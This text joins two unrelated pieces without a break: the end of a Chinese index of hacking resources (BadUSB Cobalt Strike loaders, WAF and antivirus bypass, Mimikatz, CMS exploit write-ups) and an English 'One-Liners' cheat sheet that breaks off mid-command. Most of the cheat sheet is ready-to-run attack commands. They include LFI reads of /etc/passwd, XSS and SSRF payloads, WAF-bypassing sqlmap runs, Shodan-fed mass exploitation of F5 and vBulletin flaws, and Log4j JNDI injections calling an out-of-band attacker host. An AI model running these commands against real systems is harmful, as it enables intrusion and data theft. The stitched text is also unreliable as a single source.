[BasUSBๅฎž็ŽฐๅŽๅฐ้™้ป˜ๆ‰ง่กŒไธŠ็บฟCobaltStrike](./books/BadUSB/BadUSBๅฎž็ŽฐๅŽๅฐ้™้ป˜ๆ‰ง่กŒไธŠ็บฟCobaltStrike.pdf) - [ๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๅˆถไฝœไธ€ไธชX่ฐ่ฐไธŠ็บฟ็š„BadUSB](./books/BadUSB/ๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๅˆถไฝœไธ€ไธชX่ฐ่ฐไธŠ็บฟ็š„BadUSB.pdf)|[่ฟ‘ๆบๆธ—้€-BadUsb](./books/่ฟ‘ๆบๆธ—้€-BadUsb.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/3tX6uxqw0_tjhQK0ARec5A) - [ไธ€ๆ–‡ๅญฆไผšWeb_ServiceๆผๆดžๆŒ–ๆŽ˜](./books/ไธ€ๆ–‡ๅญฆไผšWeb_ServiceๆผๆดžๆŒ–ๆŽ˜.pdf) - [ๅ”ฏๅฟซไธ็ ด็š„ๅˆ†ๅ—ไผ ่พ“็ป•WAF](./books/ๅ”ฏๅฟซไธ็ ด็š„ๅˆ†ๅ—ไผ ่พ“็ป•WAF.pdf) - [Unicode็š„่ง„่ŒƒๅŒ–็›ธๅ…ณๆผๆดžๆŒ–ๆŽ˜ๆ€่ทฏๅฎžๆ“](./books/Unicode็š„่ง„่ŒƒๅŒ–็›ธๅ…ณๆผๆดžๆŒ–ๆŽ˜ๆ€่ทฏๅฎžๆ“.pdf) - [ๆขไธ€็งๅงฟๅŠฟๆŒ–ๆŽ˜ไปปๆ„็”จๆˆทๅฏ†็ ้‡็ฝฎๆผๆดž-ๅˆฉ็”จไธ่ง„่ŒƒๅŒ–็š„Unicode็ผ–็ ๅŠ burpๆŒ–ๆŽ˜](./books/ๆขไธ€็งๅงฟๅŠฟๆŒ–ๆŽ˜ไปปๆ„็”จๆˆทๅฏ†็ ้‡็ฝฎๆผๆดž-ๅˆฉ็”จUnicodeๅŸŸๅๅŠ burpๆŒ–ๆŽ˜.pdf) - [ๅ…จๆ–น้ข็ป•่ฟ‡ๅฎ‰ๅ…จ็‹—2](./books/ๅ…จๆ–น้ข็ป•่ฟ‡ๅฎ‰ๅ…จ็‹—2.pdf) - [ๅ†ฐ่Žโ€”โ€”ไปŽๅ…ฅ้—จๅˆฐ้ญ”ๆ”น](./books/ๅ†ฐ่Žโ€”โ€”ไปŽๅ…ฅ้—จๅˆฐ้ญ”ๆ”น.pdf) - [ๅ†ฐ่Žโ€”โ€”ไปŽๅ…ฅ้—จๅˆฐ้ญ”ๆ”น(็ปญ)](./books/ๅ†ฐ่Žโ€”โ€”ไปŽๅ…ฅ้—จๅˆฐ้ญ”ๆ”น(็ปญ).pdf) - [ๆŠ€ๆœฏๅˆ†ไบซ_ ๅ†…็ฝ‘ๆธ—้€ๆ‰‹ๅŠจๅญฆไน ๅฎž่ทต](./books/ๆŠ€ๆœฏๅˆ†ไบซ%20_%20ๅ†…็ฝ‘ๆธ—้€ๆ‰‹ๅŠจๅญฆไน ๅฎž่ทต.pdf) - [ๆƒ้™็ปดๆŒไน‹ๆ‰“้€ ไธไธ€ๆ ท็š„ๆ˜ ๅƒๅŠซๆŒๅŽ้—จ](./books/ๆƒ้™็ปดๆŒไน‹ๆ‰“้€ ไธไธ€ๆ ท็š„ๆ˜ ๅƒๅŠซๆŒๅŽ้—จ.pdf) - [Jbossๆผๆดžๅˆฉ็”จๆ€ป็ป“](./books/Jbossๆผๆดžๅˆฉ็”จๆ€ป็ป“.pdf) - [Java RMIๆœๅŠก่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๅˆฉ็”จ](./books/Java_RMIๆœๅŠก่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๅˆฉ็”จ.pdf)|[ๅฐๅคฉไน‹ๅคฉ็š„ๆต‹่ฏ•ๅทฅๅ…ท-attackRMI.jar](./tools/attackRMI.jar) - [PbootCMSไปปๆ„ไปฃ็ ๆ‰ง่กŒ(ไปŽv1.0.1ๅˆฐv2.0.9)็š„ๅ‰ไธ–ไปŠ็”Ÿ](./books/PbootCMSไปปๆ„ไปฃ็ ๆ‰ง่กŒ(ไปŽv1.0.1ๅˆฐv2.0.9)็š„ๅ‰ไธ–ไปŠ็”Ÿ.pdf) - [ๅฎžๆˆ˜็ป•่ฟ‡ๅŒ้‡waf(็Ž„ๆญฆ็›พ+็จ‹ๅบ่‡ช่บซ่ฟ‡ๆปค)็ป“ๅˆ็ผ–ๅ†™sqlmap็š„tamper่Žทๅ–ๆ•ฐๆฎ](./books/ๅฎžๆˆ˜็ป•่ฟ‡ๅŒ้‡waf(็Ž„ๆญฆ็›พ+็จ‹ๅบ่‡ช่บซ่ฟ‡ๆปค)็ป“ๅˆ็ผ–ๅ†™sqlmap็š„tamper่Žทๅ–ๆ•ฐๆฎ.pdf) - [OneThinkๅ‰ๅฐๆณจๅ…ฅๅˆ†ๆž](./books/OneThinkๅ‰ๅฐๆณจๅ…ฅๅˆ†ๆž.pdf) - [่ฎฐไธ€ๆฌกไปŽๆบไปฃ็ ๆณ„ๆผๅˆฐๅŽๅฐ(ๅพฎๆ“Žcms)่Žทๅ–webshell็š„่ฟ‡็จ‹](./books/่ฎฐไธ€ๆฌกไปŽๆบไปฃ็ ๆณ„ๆผๅˆฐๅŽๅฐ(ๅพฎๆ“Žcms)่Žทๅ–webshell็š„่ฟ‡็จ‹.pdf) - [AndroidๆŠ“ๅŒ…โ€”ๅ…ณไบŽๆŠ“ๅŒ…็š„็ขŽ็ขŽๅฟต-็œ‹้›ช่ฎบๅ›-Androidๆฟๅ—ChenSem](./books/ๅ…ณไบŽๆŠ“ๅŒ…็š„็ขŽ็ขŽๅฟต.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://bbs.pediy.com/thread-260965.htm) - [CVE-2020-15778-Openssh-SCPๅ‘ฝไปคๆณจๅ…ฅๆผๆดžๅค็ŽฐๆŠฅๅ‘Š](./books/CVE-2020-15778-Openssh-SCPๅ‘ฝไปคๆณจๅ…ฅๆผๆดžๅค็ŽฐๆŠฅๅ‘Š.pdf) - [bolt_cms_V3.7.0_xssๅ’Œ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](./books/bolt_cms_V3.7.0_xssๅ’Œ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž.pdf) - [ๅ…ณไบŽCobalt_Strikeๆฃ€ๆต‹ๆ–นๆณ•ไธŽๅŽป็‰นๅพ็š„ๆ€่€ƒ](./books/ๅ…ณไบŽCobalt_Strikeๆฃ€ๆต‹ๆ–นๆณ•ไธŽๅŽป็‰นๅพ็š„ๆ€่€ƒ.pdf) - [ไปฃ็ ๅฎก่ฎก_PHPCMS_V9ๅ‰ๅฐRCEๆŒ–ๆŽ˜ๅˆ†ๆž](./books/ไปฃ็ ๅฎก่ฎก_PHPCMS_V9ๅ‰ๅฐRCEๆŒ–ๆŽ˜ๅˆ†ๆž.pdf) - [ใ€ๅ…ๆ€ใ€‘C++ๅ…ๆ€้กน็›ฎๆŽจ่](./books/C++ๅ…ๆ€้กน็›ฎๆŽจ่.pdf)-[้™„ไปถไธ‹่ฝฝ](./tools/RefacterC.zip)|[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/0OB0yQAiOfsU4JqkCDUi7w) - [ๅˆฉ็”จๅ›พ็‰‡้šๅ†™ๆœฏๆฅ่ฟœ็จ‹ๅŠจๆ€ๅŠ ่ฝฝshellcode](./books/ๅˆฉ็”จๅ›พ็‰‡้šๅ†™ๆœฏๆฅ่ฟœ็จ‹ๅŠจๆ€ๅŠ ่ฝฝshellcode.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/QZ5YlRZN47zne7vCzvUpJw) - [[ๅŽๆธ—้€]Mimikatzไฝฟ็”จๅคงๅ…จ](./books/[ๅŽๆธ—้€]Mimikatzไฝฟ็”จๅคงๅ…จ.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://www.cnblogs.com/-mo-/p/11890232.html) - [ๆธ—้€ๆต‹่ฏ•XiaoCmsไน‹่‡ชๅŠ›ๆ›ด็”Ÿไปฃ็ ๅฎก่ฎก-ๅŽๅฐๆ•ฐๆฎๅบ“ๅค‡ไปฝSQLๆณจๅ…ฅๅˆฐgetshell](./books/ๆธ—้€ๆต‹่ฏ•XiaoCmsไน‹่‡ชๅŠ›ๆ›ด็”Ÿไปฃ็ ๅฎก่ฎก-ๅŽๅฐๆ•ฐๆฎๅบ“ๅค‡ไปฝSQLๆณจๅ…ฅๅˆฐgetshell.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/K2nUSMyE4PwVYqa7t95BTQ) - [HW็คผ็›’๏ผšๆทฑไฟกๆœedr RCE๏ผŒๅคฉ่žไฟกdlp unauthๅ’Œ้€š่พพOA v11.6็‰ˆๆœฌRCE](./books/HW%E7%A4%BC%E7%9B%92%EF%BC%9A%E6%B7%B1%E4%BF%A1%E6%9C%8Dedr%20RCE%EF%BC%8C%E5%A4%A9%E8%9E%8D%E4%BF%A1dlp%20unauth%E5%92%8C%E9%80%9A%E8%BE%BEOA%20v11.6%E7%89%88%E6%9C%ACRCE.pdf) - [wordpress ่ฏ„่ฎบๆ’ไปถ wpDiscuz ไปปๆ„ๆ–‡ไปถไธŠไผ ๆผๆดžๅˆ†ๆž](./books/wordpress%20%E8%AF%84%E8%AE%BA%E6%8F%92%E4%BB%B6%20wpDiscuz%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.pdf) - [Gopherๅ่ฎฎไฝฟ็”จๆ€ป็ป“](./books/Gopherๅ่ฎฎไฝฟ็”จๆ€ป็ป“.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/SjGvsl3jxOtyg6BtGgFf5A) - [sqlmapไฝฟ็”จๆ€ป็ป“](./books/sqlmapไฝฟ็”จๆ€ป็ป“.pdf)|[ใ€ๅฎžๆˆ˜ๆŠ€ๅทงใ€‘sqlmapไธไธบไบบ็Ÿฅ็š„้ชšๆ“ไฝœ](./books/%E3%80%90%E5%AE%9E%E6%88%98%E6%8A%80%E5%B7%A7%E3%80%91sqlmap%E4%B8%8D%E4%B8%BA%E4%BA%BA%E7%9F%A5%E7%9A%84%E9%AA%9A%E6%93%8D%E4%BD%9C_Summer's_blog.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://blog.csdn.net/sun1318578251/article/details/102524100)|[่ฎฐไธ€ไปฝSQLmap ไฝฟ็”จๆ‰‹ๅ†Œๅฐ็ป“๏ผˆไธ€๏ผ‰](./books/่ฎฐไธ€ไปฝSQLmap%20ไฝฟ็”จๆ‰‹ๅ†Œๅฐ็ป“๏ผˆไธ€๏ผ‰.pdf)|[่ฎฐไธ€ไปฝSQLmap ไฝฟ็”จๆ‰‹ๅ†Œๅฐ็ป“๏ผˆไบŒ๏ผ‰](./books/่ฎฐไธ€ไปฝSQLmap%20ไฝฟ็”จๆ‰‹ๅ†Œๅฐ็ป“๏ผˆไบŒ๏ผ‰.pdf) - [macไธŠParallels Desktopๅฎ‰่ฃ…kali linux 2020.2aๅนถๅฎ‰่ฃ…ๅฅฝParallels Tools+Googleๆ‹ผ้Ÿณ่พ“ๅ…ฅๆณ•](./books/mac%E4%B8%8AParallels%20Desktop%E5%AE%89%E8%A3%85kali%20linux%202020.2a%E5%B9%B6%E5%AE%89%E8%A3%85%E5%A5%BDParallels%20Tools+Google%E6%8B%BC%E9%9F%B3%E8%BE%93%E5%85%A5%E6%B3%95.docx) - [้€š่พพOA v11.5 ๅคšๆžš0dayๆผๆดžๅค็Žฐ](./books/%E9%80%9A%E8%BE%BEOA%20v11.5%20%E5%A4%9A%E6%9E%9A0day%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.pdf)|[็ปญ้›† _ ๅ†ๅ‘้€š่พพOAๅคšๆžš0day](./books/%E7%BB%AD%E9%9B%86%20_%20%E5%86%8D%E5%8F%91%E9%80%9A%E8%BE%BEOA%E5%A4%9A%E6%9E%9A0day.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/RlOpohHvjHv_Qg3mNgDCAQ) - [POSCMS(20200821)_ไปปๆ„ SQL ่ฏญๅฅๆ‰ง่กŒ๏ผˆ้œ€่ฆ็™ปๅฝ•ๅŽๅฐ๏ผ‰](./books/POSCMS_%E4%BB%BB%E6%84%8F%20SQL%20%E8%AF%AD%E5%8F%A5%E6%89%A7%E8%A1%8C%EF%BC%88%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95%E5%90%8E%E5%8F%B0%EF%BC%89.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://www.t00ls.net/thread-57551-1-1.html)|[POSCMS v3.2.0ๆผๆดžๅค็Žฐ(getshell+ๅ‰ๅฐSQLๆณจๅ…ฅ)](./books/POSCMS%20v3.2.0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(getshell+%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5).pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://xz.aliyun.com/t/4858) - [ๅคš็บฟ็จ‹+ไบŒๅˆ†ๆณ•็š„ๅทง็”จโ€”โ€”้€š่พพOA 2017 SQL็›ฒๆณจ](./books/%E5%A4%9A%E7%BA%BF%E7%A8%8B+%E4%BA%8C%E5%88%86%E6%B3%95%E7%9A%84%E5%B7%A7%E7%94%A8%E2%80%94%E2%80%94%E9%80%9A%E8%BE%BEOA%20SQL%E7%9B%B2%E6%B3%A8.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g) ## <span id="head9"> ่ฏดๆ˜Ž</span> ### ๅ…่ดฃๅฃฐๆ˜Ž > 1.ๆญค้กน็›ฎๆ‰€ๆœ‰ๆ–‡็ซ ใ€ไปฃ็ ้ƒจๅˆ†ๆฅๆบไบŽไบ’่”็ฝ‘๏ผŒ็‰ˆๆƒๅฝ’ๅŽŸไฝœ่€…ๆ‰€ๆœ‰๏ผŒ่ฝฌ่ฝฝ็•™ๅญ˜็š„้ƒฝไผšๅ†™ไธŠๅŽŸ่‘—ๅ‡บๅค„๏ผŒๅฆ‚ๆœ‰้—ๆผ๏ผŒ่ฟ˜่ฏท่ฏดๆ˜Ž๏ผŒ่ฐข่ฐข๏ผ > 2.ๆญค้กน็›ฎไป…ไพ›ๅญฆไน ๅ‚่€ƒไฝฟ็”จ๏ผŒไธฅ็ฆ็”จไบŽไปปไฝ•้žๆณ•่กŒไธบ๏ผไฝฟ็”จๅณไปฃ่กจไฝ ๅŒๆ„่‡ช่ดŸ่ดฃไปป๏ผ > 3.ๅฆ‚ๆžœ้กน็›ฎไธญๆถ‰ๅŠๅˆฐไฝ ็š„้š็งๆˆ–่€…้œ€่ฆๅˆ ้™ค็š„๏ผŒ่ฏทissue็•™่จ€ๆŒ‡ๅๅ…ทไฝ“ๆ–‡ไปถๅ†…ๅฎน๏ผŒ้™„ไธŠไฝ ็š„่ฏๆ˜Ž๏ผŒๆˆ–่€…้‚ฎ็ฎฑ่”็ณปๆˆ‘๏ผŒๆ ธๅฎžๅŽๅณๅˆปๅˆ ้™คใ€‚ ### ๅ–œ่ฎฏ ๅœจ`2020-08-16`็™ปไธŠ`GitHub`็š„`Trending`ๆ—ฅๆฆœ๏ผŒ่ฐข่ฐขๅคงๅฎถๆ”ฏๆŒ๏ผŒ่ฐข่ฐข้‚ฃไบ›ๅœจfreebufๅ’Œๅ…ฌไผ—ๅทๆŽจ่็š„ๅธˆๅ‚…๏ผŒๆˆ‘ไผš็ปง็ปญๅŠชๅŠ›๏ผŒๆœŸๅพ…ๆœ‰้ ่ฐฑ็š„ๅธˆๅ‚…ไธ€่ตทๆฅ็ปดๆŠคไผ˜ๅŒ–๏ผŒๆ„Ÿๅ…ด่ถฃ็š„้‚ฎ็ฎฑ่”็ณปๆˆ‘ๅง๏ผ ![](./img/trending.png) ### ๆœ€ๅŽ๏ผŒ้€‰ไธ€ไธชๅฑ่‚กๅง๏ผ ![](https://ooo.0o0.ooo/2017/06/13/593fb9335fe9c.jpg)
# One-Liners [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re) ###### Thanks to all who create these Awesome One Linersโค๏ธ ---------------------- ![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png) --------------------------- # Subdomain Enumeration **Juicy Subdomains** ``` subfinder -d target.com -silent | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn' ``` **from BufferOver.run** ``` curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u ``` **from Riddler.io** ``` curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` **from nmap** ``` nmap --script hostmap-crtsh.nse target.com ``` **from CertSpotter** ``` curl -s "https://certspotter.com/api/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` **from Archive** ``` curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u ``` **from JLDC** ``` curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` **from crt.sh** ``` curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ``` **from ThreatMiner** ``` curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u ``` **from Anubis** ``` curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com" ``` **from ThreatCrowd** ``` curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com" ``` **from HackerTarget** ``` curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" ``` ***SubDomain Bruteforcing - ffuf*** ``` ffuf -u https://FUZZ.target.com -w dns.txt -v | grep "| URL |" | awk '{print $4}' ``` -------- ## Subdomain Takeover: ``` cat subs.txt | xargs -P 50 -I % bash -c "dig % | grep CNAME" | awk '{print $1}' | sed 's/.$//g' | httpx -silent -status-code -cdn -csp-probe -tls-probe ``` ------------------------------- ## LFI: ``` cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" ``` ``` waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' ``` ``` cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done ``` ---------------------- ## Open Redirect: ``` waybackurls target.com | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done ``` ``` cat subs.txt| waybackurls | gf redirect | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain' ``` ----------------------- ## SSRF: ``` cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"' ``` ``` cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ ``` ---------------- ## XSS: ``` cat domains.txt | waybackurls | grep -Ev "\.(jpeg|jpg|png|ico)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>" ``` ``` gau target.com grep '='| qsreplace hack\" -a | while read url;do target-$(curl -s -l $url | egrep -o '(hack" | hack\\")'); echo -e "Target : \e[1;33m $url\e[om" "$target" "\n -"; done I sed 's/hack"/[xss Possible] Reflection Found/g' ``` ``` cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert(" ``` ``` cat targets.txt | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe ``` ``` waybackurls target.com | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done ``` ``` cat urls.txt | grep "=" | sed โ€˜s/=.*/=/โ€™ | sed โ€˜s/URL: //โ€™ | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht ``` ``` cat targets.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)" ``` ``` cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl' ``` --------------------- ## Hidden Dirs: ``` dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt ``` ``` ffuf -c -w urls.txt:FUZZ1 -w wordlist.txt:FUZZ2 -u FUZZ1/FUZZ2 -mc 200 -ac -v -of json -o output ``` ## ffuf json to txt output ``` cat output.json | jq | grep -o '"url": ".*"' | grep -o 'https://[^"]*' ``` **Search for Sensitive files from Wayback** ``` waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar" ``` ``` cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml" -mc 200 ``` ------------------- ## SQLi: ``` cat subs.txt | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 5 --risk 3 ``` ***Bypass WAF using TOR*** ``` sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor ``` ---------------- ## CORS: ``` gau "http://target.com" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done ``` --------------- ## Prototype Pollution: ``` subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" ``` ------------- ## CVEs: ### CVE-2020-5902: ``` shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done ``` ### CVE-2020-3452: ``` while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt ``` ### CVE-2021-44228: ``` cat subdomains.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://log4j.requestcatcher.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://log4j.requestcatcher.com/a}";done ``` ``` cat urls.txt | sed `s/https:///` | xargs -I {} echo `{}/${jndi:ldap://{}attacker.burpcollab.net}` >> lo4j.txt ``` ### CVE-2022-0378: ``` cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done ``` ### CVE-2022-22954: ``` cat urls.txt | while read h do ; do curl -sk --path-as-is โ€œ$h/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}โ€| grep "context" && echo "$h\033[0;31mV\n"|| echo "$h \033[0;32mN\n";done ``` ### CVE-2022-41040: ``` ffuf -w "urls.txt:URL" -u "https://URL/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL" -mr "IIS Web Core" -r ``` --------- ## RCE: ``` cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent ``` ### vBulletin 5.6.2 ``` shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; ``` ``` subfinder -d target.com | httpx | gau | qsreplace โ€œaaa%20%7C%7C%20id%3B%20xโ€ > fuzzing.txt; ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` ----------- ## JS Files: ### Find JS Files: ``` gau -subs target.com |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ``` ``` assetfinder target.com | waybackurls | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars" ``` ### Hidden Params in JS: ``` cat subdomains.txt | gauplus -subs -t 100 -random-agent | sort -u --version-sort | httpx -silent -threads 2000 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done ``` ### Extract sensitive end-point in JS: ``` cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u ``` ------------------------- ### SSTI: ``` for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done ``` --------------------------- ## HeartBleed ``` cat urls.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line; safe; done ``` ------------------ ## Scan IPs ``` cat my_ips.txt | xargs -L100 shodan scan submit --wait 0 ``` ## Portscan ``` naabu -l targets.txt -rate 3000 -retries 3 -warm-up-time 0 -rate 150 -c 50 -ports 1-65535 -silent -o out.txt ``` ## Screenshots using Nuclei ``` nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v ``` ## IPs from CIDR ``` echo cidr | httpx -t 100 | nuclei -t ~/nuclei-templates/ssl/ssl-dns-names.yaml | cut -d " " -f7 | cut -d "]" -f1 | sed 's/[//' | sed 's/,/\n/g' | sort -u ``` ``` mapcidr -cidr <CIDR> -silent ``` ## SQLmap Tamper Scripts - WAF bypass ``` sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent ``` ## Shodan Cli ``` shodan search Ssl.cert.subject.CN:"target.com" 200 --field ip_str | httpx -silent | tee ips.txt ``` ### ffuf txt output ``` ffuf -w wordlists.txt -u URL/FUZZ -r -ac -v &>> output.txt ; sed -i 's/\:\: Progress.*Errors.*\:\://g' output.txt ; sed -i 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' output.txt ``` ### Ffuf json to only url ``` cat ffuf.json | jq | grep "url" | sed 's/"//g' | sed 